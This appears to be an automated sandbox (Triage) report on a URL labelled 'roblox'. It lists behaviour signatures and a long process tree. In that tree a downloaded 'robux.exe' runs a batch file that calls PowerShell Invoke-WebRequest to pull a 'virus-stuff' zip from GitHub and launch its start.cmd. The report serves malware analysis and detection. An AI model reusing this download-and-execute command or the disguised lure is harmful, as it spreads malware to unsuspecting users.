hxxp://roblox | Triage

Analysis

max time kernel
912s
max time network
913s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
05/08/2024, 12:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://roblox

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
180	4472	powershell.exe
182	4472	powershell.exe
1212	6008	powershell.exe
1214	6008	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
4472	powershell.exe
6008	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
159	raw.githubusercontent.com
160	raw.githubusercontent.com
161	raw.githubusercontent.com
152	raw.githubusercontent.com
153	raw.githubusercontent.com
154	raw.githubusercontent.com
158	raw.githubusercontent.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
290	api64.ipify.org
295	api64.ipify.org
289	api64.ipify.org

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	melter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	robux.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	robux.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
6384	timeout.exe
4892	timeout.exe
1680	timeout.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2170637797-568393320-3232933035-1000\{C451F671-63E3-4935-A696-31F2B0A6892A}	msedge.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
5760	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4472	powershell.exe
4472	powershell.exe
4472	powershell.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
5704	OpenWith.exe
5440	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	4472	powershell.exe
Token: SeDebugPrivilege	5440	taskmgr.exe
Token: SeSystemProfilePrivilege	5440	taskmgr.exe
Token: SeCreateGlobalPrivilege	5440	taskmgr.exe
Token: SeDebugPrivilege	6008	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe
5440	taskmgr.exe

Suspicious use of SetWindowsHookEx 17 IoCs

pid	Process
5704	OpenWith.exe
5704	OpenWith.exe
5704	OpenWith.exe
5704	OpenWith.exe
5704	OpenWith.exe
5704	OpenWith.exe
5704	OpenWith.exe
5704	OpenWith.exe
5704	OpenWith.exe
5704	OpenWith.exe
5704	OpenWith.exe
5704	OpenWith.exe
5704	OpenWith.exe
5704	OpenWith.exe
5704	OpenWith.exe
5704	OpenWith.exe
5704	OpenWith.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2748 wrote to memory of 3104	2748	robux.exe	125
PID 2748 wrote to memory of 3104	2748	robux.exe	125
PID 3104 wrote to memory of 4472	3104	cmd.exe	126
PID 3104 wrote to memory of 4472	3104	cmd.exe	126
PID 3104 wrote to memory of 4892	3104	cmd.exe	127
PID 3104 wrote to memory of 4892	3104	cmd.exe	127
PID 5704 wrote to memory of 5760	5704	OpenWith.exe	140
PID 5704 wrote to memory of 5760	5704	OpenWith.exe	140
PID 4284 wrote to memory of 2800	4284	robux.exe	185
PID 4284 wrote to memory of 2800	4284	robux.exe	185
PID 2800 wrote to memory of 6008	2800	cmd.exe	186
PID 2800 wrote to memory of 6008	2800	cmd.exe	186
PID 2800 wrote to memory of 1680	2800	cmd.exe	187
PID 2800 wrote to memory of 1680	2800	cmd.exe	187
PID 2800 wrote to memory of 6384	2800	cmd.exe	188
PID 2800 wrote to memory of 6384	2800	cmd.exe	188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://roblox
1⤵
PID:3344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=3836,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=4932 /prefetch:1
1⤵
PID:4708

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=4032,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=4748 /prefetch:1
1⤵
PID:324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5416,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=5448 /prefetch:8
1⤵
PID:212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5440,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=5500 /prefetch:8
1⤵
PID:3128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --field-trial-handle=5900,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=5916 /prefetch:1
1⤵
PID:5060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=5260,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=5272 /prefetch:1
1⤵
PID:4656

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=5256,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=6168 /prefetch:1
1⤵
PID:4784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --field-trial-handle=5488,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=5132 /prefetch:1
1⤵
PID:1372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=6272,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=6304 /prefetch:8
1⤵
PID:3080

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --field-trial-handle=6516,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=6488 /prefetch:1
1⤵
PID:3916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --field-trial-handle=6740,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=6756 /prefetch:1
1⤵
PID:3736

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=6620,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=6480 /prefetch:8
1⤵
PID:4280

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --field-trial-handle=6480,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=6140 /prefetch:1
1⤵
PID:3480

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --field-trial-handle=6900,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=6112 /prefetch:8
1⤵
PID:3028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --field-trial-handle=6908,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=6936 /prefetch:8
1⤵
- Modifies registry class
PID:3304

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --field-trial-handle=7044,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=7060 /prefetch:1
1⤵
PID:3436

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --field-trial-handle=7180,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=7200 /prefetch:1
1⤵
PID:1468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --field-trial-handle=7336,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=7228 /prefetch:1
1⤵
PID:2236

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --field-trial-handle=6696,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=6544 /prefetch:8
1⤵
PID:3780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --field-trial-handle=6128,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=6532 /prefetch:1
1⤵
PID:2360

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --field-trial-handle=7784,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=7716 /prefetch:8
1⤵
PID:4864

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --field-trial-handle=7736,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=7656 /prefetch:8
1⤵
PID:3460

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4364

C:\Users\Admin\Downloads\robux.exe
"C:\Users\Admin\Downloads\robux.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2748
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\ACFF.tmp\AD00.tmp\AD01.bat C:\Users\Admin\Downloads\robux.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3104
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4472
- - C:\Windows\system32\timeout.exe
    timeout /t 10 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:4892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Temp1_robux2.zip\virus-stuff-main\start.cmd" "
1⤵
PID:3144

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5440

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5704
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_robux2.zip\virus-stuff-main\README.md
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:5760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --field-trial-handle=5560,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=5588 /prefetch:1
1⤵
PID:6088

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --field-trial-handle=5564,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=6212 /prefetch:1
1⤵
PID:2372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --field-trial-handle=6484,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=5516 /prefetch:1
1⤵
PID:1372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --field-trial-handle=5588,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=6796 /prefetch:1
1⤵
PID:5372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --field-trial-handle=6520,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=5888 /prefetch:1
1⤵
PID:2080

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --field-trial-handle=7636,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=7648 /prefetch:1
1⤵
PID:1484

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --field-trial-handle=8112,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=8124 /prefetch:1
1⤵
PID:492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --field-trial-handle=6276,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=8280 /prefetch:1
1⤵
PID:3328

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5620,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=8432 /prefetch:8
1⤵
PID:2452

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x38c 0x4f4
1⤵
PID:2196

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --field-trial-handle=5528,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=8368 /prefetch:1
1⤵
PID:1744

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --field-trial-handle=8372,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=8348 /prefetch:1
1⤵
PID:1016

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --field-trial-handle=8340,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=8792 /prefetch:1
1⤵
PID:3320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --field-trial-handle=3480,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=8900 /prefetch:1
1⤵
PID:5888

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --field-trial-handle=9044,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=8808 /prefetch:1
1⤵
PID:5540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --field-trial-handle=9212,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=9192 /prefetch:1
1⤵
PID:5940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
